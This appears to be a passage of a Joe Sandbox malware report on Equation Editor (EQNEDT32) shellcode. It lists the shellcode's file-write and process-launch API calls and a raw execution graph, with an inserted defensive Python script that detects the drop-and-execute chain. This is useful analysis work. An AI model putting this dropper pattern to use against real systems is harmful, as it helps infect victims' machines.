                                          • Opcode Fuzzy Hash: 833f1fdb2df954a47779238e40c14f53762179b8aaffb34f45396806a607e277
                                          • Instruction Fuzzy Hash: 16019AA540C7C01FFB22C2702C9AB84BE647F56604F0D8A8FA6C49F0E392A4A10A9312
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 035904C4: WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                          • Instruction ID: ec54ff6309cb440ed69d7f607e68d6993e60c0019beaa3bcd8a7763c46aa234b
                                          • Opcode Fuzzy Hash: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                          • Instruction Fuzzy Hash: D6F0FBB1008346AFEB01DE54DC41E6BBBAAFFC5B40F048D1EB1944A0B5D671D9088A62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03590395
                                            • Part of subcall function 035903AF: LoadLibraryW.KERNEL32(0359039F), ref: 035903AF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFileLibraryLoad
                                          • String ID:
                                          • API String ID: 2049390123-0
                                          • Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                          • Instruction ID: 416e03f5ae4581633a8dc9bd0f66dc3732a289f5ee2fc48d61b0a41f1f53dac0
                                          • Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                          • Instruction Fuzzy Hash: AEE0C2301483902FF930D3300C4AF95BDA43F89B00F09CC8BB2C4AF0F2C6A060048212
                                          Uniqueness

                                          Uniqueness Score: -1.00%
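Read together, the "APIs" lines in the entries above describe one routine executing out of the 0x03590000 region of EQNEDT32.EXE, a region the plugin marks as not backed by a PE image: CreateFileW with desired access C0000000 (GENERIC_READ|GENERIC_WRITE) and creation disposition 00000002 (CREATE_ALWAYS), then WriteFile, then CreateProcessW, then ExitProcess, i.e. write a payload to disk, launch it and terminate the exploited Equation Editor process. The following Python is an added triage helper, not part of this report or of Joe Sandbox: it parses the bullet lines in the format shown above, decodes the CreateFileW arguments with the documented Win32 constant values, and flags the drop-and-execute chain. The sample input is the API lines copied from the entries above; the function and variable names are the example's own.

```python
"""Triage helper for Joe Sandbox 'APIs' lines (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass

# Constructed sample: the API bullet lines from the EQNEDT32 dump entries above.
SAMPLE_API_LINES = """
• CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03590395
• Part of subcall function 035903AF: LoadLibraryW.KERNEL32(0359039F), ref: 035903AF
• WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
• CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
• ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
"""
SAMPLE_SOURCE_LINE = ("• Source File: 00000002.00000002.444520307.0000000003590000.00000004."
                      "00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false")

API_RE = re.compile(r"([A-Za-z0-9_]+)\.([A-Za-z0-9_]+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")
SOURCE_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)", re.I)

# Documented Win32 values for the CreateFileW arguments (insertion order = report order).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02: "FILE_ATTRIBUTE_HIDDEN",
              0x100: "FILE_ATTRIBUTE_TEMPORARY"}
DROP_AND_EXECUTE = ("CreateFile", "WriteFile", "CreateProcess", "ExitProcess")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list      # raw hex strings; '?' means the plugin could not resolve the value
    ref: int        # address of the call site


def parse_api_lines(text):
    """Extract 'Api.Module(args), ref: addr' entries and order them by call-site address."""
    calls = []
    for name, module, argstr, ref in API_RE.findall(text):
        args = [a.strip() for a in argstr.split(",")] if argstr.strip() else []
        calls.append(ApiCall(name, module, args, int(ref, 16)))
    return sorted(calls, key=lambda c: c.ref)


def _u32(arg):
    return None if arg == "?" else int(arg, 16)


def _flags(value, table):
    return [] if value is None else [n for bit, n in table.items() if value & bit]


def decode_createfile(call):
    """Decode access/share/disposition/attributes of a CreateFileA/W call."""
    if not call.name.startswith("CreateFile") or len(call.args) < 7:
        raise ValueError("not a 7-argument CreateFile call")
    access, share, disp, attrs = (_u32(call.args[i]) for i in (1, 2, 4, 5))
    return {
        "path": call.args[0],   # '?' here: built at run time, not visible statically
        "desired_access": _flags(access, GENERIC_ACCESS),
        "share_mode": _flags(share, SHARE_MODE),
        "creation_disposition": "?" if disp is None else DISPOSITION.get(disp, hex(disp)),
        "attributes": _flags(attrs, FILE_ATTRS),
    }


def find_drop_and_execute(calls):
    """Return the CreateFile -> WriteFile -> CreateProcess -> ExitProcess sub-chain, or None."""
    chain, want = [], 0
    for call in calls:
        if want < len(DROP_AND_EXECUTE) and call.name.startswith(DROP_AND_EXECUTE[want]):
            chain.append(call)
            want += 1
    return chain if want == len(DROP_AND_EXECUTE) else None


def region_info(source_line):
    """Return (base address, pe_backed) from a 'Source File' line."""
    m = SOURCE_RE.search(source_line)
    if not m:
        raise ValueError("no 'Offset: ..., based on PE: ...' field")
    return int(m.group(1), 16), m.group(2).lower() == "true"


def triage(api_text, source_line):
    """Produce human-readable findings for one dump region's API lines."""
    calls = parse_api_lines(api_text)
    base, pe_backed = region_info(source_line)
    findings = []
    chain = find_drop_and_execute(calls)
    if chain is not None:
        offsets = ", ".join(f"{c.name}@+0x{c.ref - base:x}" for c in chain)
        findings.append("drop-and-execute chain: " + offsets)
        if not pe_backed:
            findings.append("chain runs from memory not backed by a PE image")
    cf = next((c for c in calls if c.name.startswith("CreateFile")), None)
    if cf is not None:
        d = decode_createfile(cf)
        if d["creation_disposition"] == "CREATE_ALWAYS" and "GENERIC_WRITE" in d["desired_access"]:
            findings.append("CreateFile creates/overwrites a file for writing (dropper)")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_API_LINES, SAMPLE_SOURCE_LINE):
        print(line)
```

The call-site ordering matters more than the order in which the report lists the bullets: a "Part of subcall function" line belongs to a callee, so sorting by ref recovers the routine's control flow. The path argument stays "?" because the shellcode builds it at run time; the report's process tree, not this listing, is where the dropped file name appears.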

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                          • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                          • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                          • Instruction ID: dad8d9ebd07a3382fd4c97aa96f1f4a8564408607266d4b95447d883cdca1f84
                                          • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                          • Instruction Fuzzy Hash: 38D052B12025029FE704DB08DA80E13F37AFFC8220B28C669E5004B66AC330E892CA90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d63d9cbe7aee2b22caec2abe761ef9f448886455dde74c3a1debfea27b2c1948
                                          • Instruction ID: 6eeaa356b2d4eef8eaba7b014a207092e669dd60636457438198d266d7304795
                                          • Opcode Fuzzy Hash: d63d9cbe7aee2b22caec2abe761ef9f448886455dde74c3a1debfea27b2c1948
                                          • Instruction Fuzzy Hash: EFB092504088F24589479620AE686C4BF2144426093085781D0CC22012C11605669281
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:3.7%
                                          Dynamic/Decrypted Code Coverage:0.4%
                                          Signature Coverage:3%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:69
94912->94910 94913->94900 95071 e5e300 23 API calls 94914->95071 94918 e4dd6f 94917->94918 94920 e4dd83 94917->94920 95083 e4d260 256 API calls 2 library calls 94918->95083 95084 eb359c 82 API calls __wsopen_s 94920->95084 94921 e4dd7a 94921->94900 94923 e92f75 94923->94923 94925 e4e010 94924->94925 94944 e4e0dc ISource 94925->94944 95087 e60242 5 API calls __Init_thread_wait 94925->95087 94928 eb359c 82 API calls 94928->94944 94929 e92fca 94932 e4a961 22 API calls 94929->94932 94929->94944 94930 e4e3e1 94930->94900 94931 e4a961 22 API calls 94931->94944 94935 e92fe4 94932->94935 95088 e600a3 29 API calls __onexit 94935->95088 94938 e92fee 95089 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94938->95089 94940 e4ec40 256 API calls 94940->94944 94942 e4a8c7 22 API calls 94942->94944 94943 e504f0 22 API calls 94943->94944 94944->94928 94944->94930 94944->94931 94944->94940 94944->94942 94944->94943 95085 e4a81b 41 API calls 94944->95085 95086 e5a308 256 API calls 94944->95086 95090 e60242 5 API calls __Init_thread_wait 94944->95090 95091 e600a3 29 API calls __onexit 94944->95091 95092 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94944->95092 95093 ec47d4 256 API calls 94944->95093 95094 ec68c1 256 API calls 94944->95094 94948 e51376 94947->94948 94949 e517b0 94947->94949 94950 e51390 94948->94950 94951 e96331 94948->94951 95308 e60242 5 API calls __Init_thread_wait 94949->95308 94953 e51940 9 API calls 94950->94953 95313 ec709c 256 API calls 94951->95313 94956 e513a0 94953->94956 94955 e517ba 94957 e517fb 94955->94957 94959 e49cb3 22 API calls 94955->94959 94958 e51940 9 API calls 94956->94958 94962 e5182c 94957->94962 94963 e9633d 94957->94963 94960 e513b6 94958->94960 94966 e517d4 94959->94966 94960->94957 94961 e513ec 94960->94961 94961->94963 94986 e51408 __fread_nolock 94961->94986 95310 e4aceb 23 API calls ISource 94962->95310 95314 eb359c 82 API calls __wsopen_s 94963->95314 95309 e601f8 EnterCriticalSection 
LeaveCriticalSection SetEvent ResetEvent 94966->95309 94967 e51839 95311 e5d217 256 API calls 94967->95311 94970 e9636e 95315 eb359c 82 API calls __wsopen_s 94970->95315 94971 e5152f 94973 e963d1 94971->94973 94974 e5153c 94971->94974 95317 ec5745 54 API calls _wcslen 94973->95317 94976 e51940 9 API calls 94974->94976 94977 e51549 94976->94977 94981 e964fa 94977->94981 94983 e51940 9 API calls 94977->94983 94978 e5fddb 22 API calls 94978->94986 94979 e51872 95312 e5faeb 23 API calls 94979->95312 94980 e5fe0b 22 API calls 94980->94986 94990 e96369 94981->94990 95318 eb359c 82 API calls __wsopen_s 94981->95318 94988 e51563 94983->94988 94985 e4ec40 256 API calls 94985->94986 94986->94967 94986->94970 94986->94971 94986->94978 94986->94980 94986->94985 94987 e963b2 94986->94987 94986->94990 95316 eb359c 82 API calls __wsopen_s 94987->95316 94988->94981 94991 e4a8c7 22 API calls 94988->94991 94994 e515c7 ISource 94988->94994 94990->94900 94991->94994 94992 e51940 9 API calls 94992->94994 94993 e5171d 94993->94900 94994->94979 94994->94981 94994->94990 94994->94992 94996 e5167b ISource 94994->94996 95003 e44f39 68 API calls 94994->95003 95095 ebf0ec 94994->95095 95104 eb6ef1 94994->95104 95184 e5effa 94994->95184 95241 eb744a 94994->95241 95298 ead4ce 94994->95298 95301 ec959f 94994->95301 95304 ec958b 94994->95304 94996->94993 95307 e5ce17 22 API calls ISource 94996->95307 95003->94994 95786 e4adf0 95005->95786 95007 e4bf9d 95008 e4bfa9 95007->95008 95009 e904b6 95007->95009 95011 e904c6 95008->95011 95012 e4c01e 95008->95012 95805 eb359c 82 API calls __wsopen_s 95009->95805 95806 eb359c 82 API calls __wsopen_s 95011->95806 95791 e4ac91 95012->95791 95015 e904f5 95018 e9055a 95015->95018 95807 e5d217 256 API calls 95015->95807 95016 ea7120 22 API calls 95059 e4c039 ISource __fread_nolock 95016->95059 95017 e4c7da 95022 e5fe0b 22 API calls 95017->95022 95048 e4c603 95018->95048 95808 eb359c 82 API calls __wsopen_s 95018->95808 95026 e4c808 __fread_nolock 95022->95026 
95030 e5fe0b 22 API calls 95026->95030 95027 e4ec40 256 API calls 95027->95059 95028 e4af8a 22 API calls 95028->95059 95029 e9091a 95818 eb3209 23 API calls 95029->95818 95060 e4c350 ISource __fread_nolock 95030->95060 95033 e908a5 95034 e4ec40 256 API calls 95033->95034 95036 e908cf 95034->95036 95036->95048 95816 e4a81b 41 API calls 95036->95816 95037 e90591 95809 eb359c 82 API calls __wsopen_s 95037->95809 95040 e908f6 95817 eb359c 82 API calls __wsopen_s 95040->95817 95042 e4bbe0 40 API calls 95042->95059 95044 e4c237 95046 e4c253 95044->95046 95047 e4a8c7 22 API calls 95044->95047 95050 e90976 95046->95050 95053 e4c297 ISource 95046->95053 95047->95046 95048->94900 95049 e5fddb 22 API calls 95049->95059 95819 e4aceb 23 API calls ISource 95050->95819 95055 e909bf 95053->95055 95802 e4aceb 23 API calls ISource 95053->95802 95055->95048 95820 eb359c 82 API calls __wsopen_s 95055->95820 95056 e4c335 95056->95055 95057 e4c342 95056->95057 95803 e4a704 22 API calls ISource 95057->95803 95059->95015 95059->95016 95059->95017 95059->95018 95059->95026 95059->95027 95059->95028 95059->95029 95059->95033 95059->95037 95059->95040 95059->95042 95059->95044 95059->95048 95059->95049 95059->95055 95061 e5fe0b 22 API calls 95059->95061 95795 e4ad81 95059->95795 95810 ea7099 22 API calls __fread_nolock 95059->95810 95811 ec5745 54 API calls _wcslen 95059->95811 95812 e5aa42 22 API calls ISource 95059->95812 95813 eaf05c 40 API calls 95059->95813 95814 e4a993 41 API calls 95059->95814 95815 e4aceb 23 API calls ISource 95059->95815 95062 e4c3ac 95060->95062 95804 e5ce17 22 API calls ISource 95060->95804 95061->95059 95062->94900 95064 eabe78 95063->95064 95065 eabe5d 95063->95065 95066 eabea6 95064->95066 95067 eabe94 Sleep 95064->95067 95065->94866 95066->94866 95067->95066 95069->94900 95070->94879 95071->94900 95072->94900 95073->94866 95074->94889 95075->94905 95076->94905 95077->94894 95078->94894 95079->94895 95080->94891 95081->94873 95082->94875 95083->94921 
95084->94923 95085->94944 95086->94944 95087->94929 95088->94938 95089->94944 95090->94944 95091->94944 95092->94944 95093->94944 95094->94944 95319 e47510 95095->95319 95099 ebf136 95100 ebf15b 95099->95100 95101 e4ec40 256 API calls 95099->95101 95103 ebf15f 95100->95103 95370 e49c6e 95100->95370 95101->95100 95103->94994 95105 e4a961 22 API calls 95104->95105 95106 eb6f1d 95105->95106 95107 e4a961 22 API calls 95106->95107 95108 eb6f26 95107->95108 95109 eb6f3a 95108->95109 95556 e4b567 95108->95556 95111 e47510 53 API calls 95109->95111 95116 eb6f57 _wcslen 95111->95116 95112 eb70bf 95115 e44ecb 94 API calls 95112->95115 95113 eb6fbc 95114 e47510 53 API calls 95113->95114 95117 eb6fc8 95114->95117 95118 eb70d0 95115->95118 95116->95112 95116->95113 95124 eb70e9 95116->95124 95122 e4a8c7 22 API calls 95117->95122 95126 eb6fdb 95117->95126 95119 eb70e5 95118->95119 95120 e44ecb 94 API calls 95118->95120 95121 e4a961 22 API calls 95119->95121 95119->95124 95120->95119 95123 eb711a 95121->95123 95122->95126 95125 e4a961 22 API calls 95123->95125 95124->94994 95129 eb7126 95125->95129 95127 eb7027 95126->95127 95130 eb7005 95126->95130 95131 e4a8c7 22 API calls 95126->95131 95128 e47510 53 API calls 95127->95128 95133 eb7034 95128->95133 95134 e4a961 22 API calls 95129->95134 95132 e433c6 22 API calls 95130->95132 95131->95130 95135 eb700f 95132->95135 95136 eb703d 95133->95136 95137 eb7047 95133->95137 95138 eb712f 95134->95138 95139 e47510 53 API calls 95135->95139 95140 e4a8c7 22 API calls 95136->95140 95561 eae199 GetFileAttributesW 95137->95561 95142 e4a961 22 API calls 95138->95142 95143 eb701b 95139->95143 95140->95137 95145 eb7138 95142->95145 95147 e46350 22 API calls 95143->95147 95144 eb7050 95148 eb7063 95144->95148 95149 e44c6d 22 API calls 95144->95149 95146 e47510 53 API calls 95145->95146 95150 eb7145 95146->95150 95147->95127 95151 e47510 53 API calls 95148->95151 95157 eb7069 95148->95157 95149->95148 95402 e4525f 95150->95402 95153 eb70a0 
95151->95153 95562 ead076 57 API calls 95153->95562 95154 eb7166 95444 e44c6d 95154->95444 95157->95124 95159 eb71a9 95161 e4a8c7 22 API calls 95159->95161 95160 e44c6d 22 API calls 95162 eb7186 95160->95162 95163 eb71ba 95161->95163 95162->95159 95166 e46b57 22 API calls 95162->95166 95164 e46350 22 API calls 95163->95164 95165 eb71c8 95164->95165 95167 e46350 22 API calls 95165->95167 95168 eb719b 95166->95168 95169 eb71d6 95167->95169 95170 e46b57 22 API calls 95168->95170 95171 e46350 22 API calls 95169->95171 95170->95159 95172 eb71e4 95171->95172 95185 e49c6e 22 API calls 95184->95185 95186 e5f012 95185->95186 95188 e5fddb 22 API calls 95186->95188 95191 e9f0a8 95186->95191 95189 e5f02b 95188->95189 95190 e5fe0b 22 API calls 95189->95190 95192 e5f03c 95190->95192 95231 e5f0a4 95191->95231 95638 eb9caa 39 API calls 95191->95638 95606 e46246 95192->95606 95195 e4b567 39 API calls 95197 e9f10a 95195->95197 95196 e4a961 22 API calls 95198 e5f04f 95196->95198 95199 e5f0b1 95197->95199 95200 e9f112 95197->95200 95201 e46246 CloseHandle 95198->95201 95587 e5fa5b 95199->95587 95203 e4b567 39 API calls 95200->95203 95204 e5f056 95201->95204 95208 e5f0b8 95203->95208 95205 e47510 53 API calls 95204->95205 95206 e5f062 95205->95206 95207 e46246 CloseHandle 95206->95207 95209 e5f06c 95207->95209 95210 e5f0d3 95208->95210 95211 e9f127 95208->95211 95610 e45745 95209->95610 95213 e46270 22 API calls 95210->95213 95214 e5fe0b 22 API calls 95211->95214 95216 e5f0db 95213->95216 95217 e9f12c 95214->95217 95592 e5f141 95216->95592 95218 e9f140 95217->95218 95639 e5f866 ReadFile SetFilePointerEx 95217->95639 95230 e9f144 __fread_nolock 95218->95230 95640 eb0e85 22 API calls ___scrt_fastfail 95218->95640 95219 e5f085 95618 e453de 95219->95618 95220 e9f0a0 95637 e46216 CloseHandle ISource 95220->95637 95222 e5f0ea 95222->95230 95634 e462b5 22 API calls 95222->95634 95228 e5f093 95633 e453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95228->95633 95231->95195 95231->95199 
95232 e5f0fe 95235 e5f138 95232->95235 95236 e46246 CloseHandle 95232->95236 95233 e9f069 95636 eaccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 95233->95636 95234 e5f09a 95234->95231 95234->95233 95235->94994 95238 e5f12c 95236->95238 95238->95235 95635 e46216 CloseHandle ISource 95238->95635 95239 e9f080 95239->95231 95242 eb7474 95241->95242 95243 eb7469 95241->95243 95247 e4a961 22 API calls 95242->95247 95284 eb7554 95242->95284 95244 e4b567 39 API calls 95243->95244 95244->95242 95245 e5fddb 22 API calls 95246 eb7587 95245->95246 95248 e5fe0b 22 API calls 95246->95248 95249 eb7495 95247->95249 95250 eb7598 95248->95250 95251 e4a961 22 API calls 95249->95251 95253 e46246 CloseHandle 95250->95253 95252 eb749e 95251->95252 95254 e47510 53 API calls 95252->95254 95255 eb75a3 95253->95255 95256 eb74aa 95254->95256 95257 e4a961 22 API calls 95255->95257 95258 e4525f 22 API calls 95256->95258 95259 eb75ab 95257->95259 95260 eb74bf 95258->95260 95261 e46246 CloseHandle 95259->95261 95262 e46350 22 API calls 95260->95262 95263 eb75b2 95261->95263 95264 eb74f2 95262->95264 95265 e47510 53 API calls 95263->95265 95267 eb754a 95264->95267 95268 ead4ce 4 API calls 95264->95268 95266 eb75be 95265->95266 95269 e46246 CloseHandle 95266->95269 95270 e4b567 39 API calls 95267->95270 95271 eb7502 95268->95271 95272 eb75c8 95269->95272 95270->95284 95271->95267 95273 eb7506 95271->95273 95274 e45745 5 API calls 95272->95274 95275 e49cb3 22 API calls 95273->95275 95276 eb75e2 95274->95276 95277 eb7513 95275->95277 95278 eb75ea 95276->95278 95279 eb76de GetLastError 95276->95279 95684 ead2c1 26 API calls 95277->95684 95282 e453de 27 API calls 95278->95282 95281 eb76f7 95279->95281 95688 e46216 CloseHandle ISource 95281->95688 95286 eb75f8 95282->95286 95284->95245 95296 eb76a4 95284->95296 95285 eb751c 95285->95267 95685 e453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95286->95685 95288 eb7645 95289 e5fddb 22 API calls 95288->95289 95292 eb7679 
95289->95292 95290 eb7619 95686 eaccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 95290->95686 95291 eb75ff 95291->95288 95291->95290 95294 e4a961 22 API calls 95292->95294 95295 eb7686 95294->95295 95295->95296 95687 ea417d 22 API calls __fread_nolock 95295->95687 95296->94994 95689 eadbbe lstrlenW 95298->95689 95694 ec7f59 95301->95694 95303 ec95af 95303->94994 95305 ec7f59 120 API calls 95304->95305 95306 ec959b 95305->95306 95306->94994 95307->94996 95308->94955 95309->94957 95310->94967 95311->94979 95312->94979 95313->94963 95314->94990 95315->94990 95316->94990 95317->94988 95318->94990 95320 e47525 95319->95320 95321 e47522 95319->95321 95322 e4752d 95320->95322 95323 e4755b 95320->95323 95342 e49e90 95321->95342 95384 e651c6 26 API calls 95322->95384 95324 e850f6 95323->95324 95327 e4756d 95323->95327 95334 e8500f 95323->95334 95387 e65183 26 API calls 95324->95387 95385 e5fb21 51 API calls 95327->95385 95328 e4753d 95331 e5fddb 22 API calls 95328->95331 95329 e8510e 95329->95329 95333 e47547 95331->95333 95335 e49cb3 22 API calls 95333->95335 95336 e5fe0b 22 API calls 95334->95336 95337 e85088 95334->95337 95335->95321 95338 e85058 95336->95338 95386 e5fb21 51 API calls 95337->95386 95339 e5fddb 22 API calls 95338->95339 95340 e8507f 95339->95340 95341 e49cb3 22 API calls 95340->95341 95341->95337 95388 e46270 95342->95388 95344 e49fd2 95394 e4a4a1 22 API calls __fread_nolock 95344->95394 95348 e8f7c4 95399 ea96e2 84 API calls __wsopen_s 95348->95399 95349 e8f699 95356 e5fddb 22 API calls 95349->95356 95350 e4a405 95352 e49fec 95350->95352 95401 ea96e2 84 API calls __wsopen_s 95350->95401 95352->95099 95354 e4a6c3 22 API calls 95368 e49eb5 95354->95368 95358 e8f754 95356->95358 95357 e8f7d2 95400 e4a4a1 22 API calls __fread_nolock 95357->95400 95361 e5fe0b 22 API calls 95358->95361 95360 e8f7e8 95360->95352 95362 e4a12c __fread_nolock 95361->95362 95362->95348 95362->95350 95364 e4a587 22 API calls 95364->95368 95365 e4aec9 22 API calls 
95366 e4a0db CharUpperBuffW 95365->95366 95395 e4a673 22 API calls 95366->95395 95368->95344 95368->95348 95368->95349 95368->95350 95368->95354 95368->95362 95368->95364 95368->95365 95369 e4a4a1 22 API calls 95368->95369 95393 e44573 41 API calls _wcslen 95368->95393 95396 e448c8 23 API calls 95368->95396 95397 e449bd 22 API calls __fread_nolock 95368->95397 95398 e4a673 22 API calls 95368->95398 95369->95368 95371 e49c7e 95370->95371 95372 e8f545 95370->95372 95377 e5fddb 22 API calls 95371->95377 95373 e8f556 95372->95373 95375 e46b57 22 API calls 95372->95375 95374 e4a6c3 22 API calls 95373->95374 95376 e8f560 95374->95376 95375->95373 95376->95376 95378 e49c91 95377->95378 95379 e49cac 95378->95379 95380 e49c9a 95378->95380 95382 e4a961 22 API calls 95379->95382 95381 e49cb3 22 API calls 95380->95381 95383 e49ca2 95381->95383 95382->95383 95383->95103 95384->95328 95385->95328 95386->95324 95387->95329 95389 e5fe0b 22 API calls 95388->95389 95390 e46295 95389->95390 95391 e5fddb 22 API calls 95390->95391 95392 e462a3 95391->95392 95392->95368 95393->95368 95394->95352 95395->95368 95396->95368 95397->95368 95398->95368 95399->95357 95400->95360 95401->95352 95403 e4a961 22 API calls 95402->95403 95404 e45275 95403->95404 95405 e4a961 22 API calls 95404->95405 95406 e4527d 95405->95406 95407 e4a961 22 API calls 95406->95407 95408 e45285 95407->95408 95409 e4a961 22 API calls 95408->95409 95410 e4528d 95409->95410 95411 e452c1 95410->95411 95412 e83df5 95410->95412 95413 e46d25 22 API calls 95411->95413 95414 e4a8c7 22 API calls 95412->95414 95415 e452cf 95413->95415 95416 e83dfe 95414->95416 95417 e493b2 22 API calls 95415->95417 95418 e4a6c3 22 API calls 95416->95418 95419 e452d9 95417->95419 95420 e45304 95418->95420 95419->95420 95421 e46d25 22 API calls 95419->95421 95422 e45349 95420->95422 95423 e45325 95420->95423 95440 e83e20 95420->95440 95425 e452fa 95421->95425 95563 e46d25 95422->95563 95423->95422 95428 e44c6d 22 API calls 95423->95428 95427 
e493b2 22 API calls 95425->95427 95426 e4535a 95429 e45370 95426->95429 95434 e4a8c7 22 API calls 95426->95434 95427->95420 95430 e45332 95428->95430 95432 e45384 95429->95432 95436 e4a8c7 22 API calls 95429->95436 95430->95422 95435 e46d25 22 API calls 95430->95435 95431 e46b57 22 API calls 95441 e83ee0 95431->95441 95433 e4538f 95432->95433 95437 e4a8c7 22 API calls 95432->95437 95438 e4a8c7 22 API calls 95433->95438 95442 e4539a 95433->95442 95434->95429 95435->95422 95436->95432 95437->95433 95438->95442 95439 e44c6d 22 API calls 95439->95441 95440->95431 95441->95422 95441->95439 95576 e449bd 22 API calls __fread_nolock 95441->95576 95442->95154 95445 e4aec9 22 API calls 95444->95445 95446 e44c78 95445->95446 95446->95159 95446->95160 95557 e4b578 95556->95557 95558 e4b57f 95556->95558 95557->95558 95586 e662d1 39 API calls _strftime 95557->95586 95558->95109 95560 e4b5c2 95560->95109 95561->95144 95562->95157 95564 e46d34 95563->95564 95565 e46d91 95563->95565 95564->95565 95567 e46d3f 95564->95567 95566 e493b2 22 API calls 95565->95566 95568 e46d62 __fread_nolock 95566->95568 95569 e84c9d 95567->95569 95570 e46d5a 95567->95570 95568->95426 95572 e5fddb 22 API calls 95569->95572 95577 e46f34 22 API calls 95570->95577 95573 e84ca7 95572->95573 95574 e5fe0b 22 API calls 95573->95574 95575 e84cda 95574->95575 95576->95441 95577->95568 95586->95560 95641 e454c6 95587->95641 95590 e454c6 3 API calls 95591 e5fa9a 95590->95591 95591->95208 95593 e5f14c 95592->95593 95594 e5f188 95592->95594 95593->95594 95596 e5f15b 95593->95596 95595 e4a6c3 22 API calls 95594->95595 95602 eacaeb 95595->95602 95597 e5f170 95596->95597 95600 e5f17d 95596->95600 95647 e5f18e 95597->95647 95598 eacb1a 95598->95222 95654 